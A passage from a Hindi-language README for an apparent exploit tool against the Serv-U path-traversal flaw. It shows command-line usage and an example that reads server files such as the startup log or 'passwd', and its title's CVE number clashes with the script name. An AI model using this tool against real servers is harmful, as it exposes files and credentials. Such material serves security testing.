
CVE-2024-28955 शोषण PoC
15.4.2 या निचला) से करता है।इस उपकरण का उपयोग करने के लिए, आपके पास Python स्थापित होना चाहिए। उपयुक्त तर्कों के साथ स्क्रिप्ट चलाएँ:
python3 CVE-2024-28995.py -u <URL> [-d <Directory Path>] [-f <File Name>] [-w <Wordlist>]
-u, --url: शोषण करने के लिए URL (आवश्यक)।
-d, --dir: फ़ाइल पठन के लिए निर्देशिका पथ (जैसे, ProgramData/RhinoSoft/Serv-U/)।
-f, --file: फ़ाइल पठन के लिए फ़ाइल पढ़ें (जैसे, Serv-U-StartupLog.txt या passwd)।
-w, --wordlist: परीक्षण के लिए अतिरिक्त पथों की वर्डलिस्ट।
उदाहरण
python3 CVE-2024-28995.py -u http://example.com -d ProgramData/RhinoSoft/Serv-U/ -f Serv-U-StartupLog.txt



संदर्भ
https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/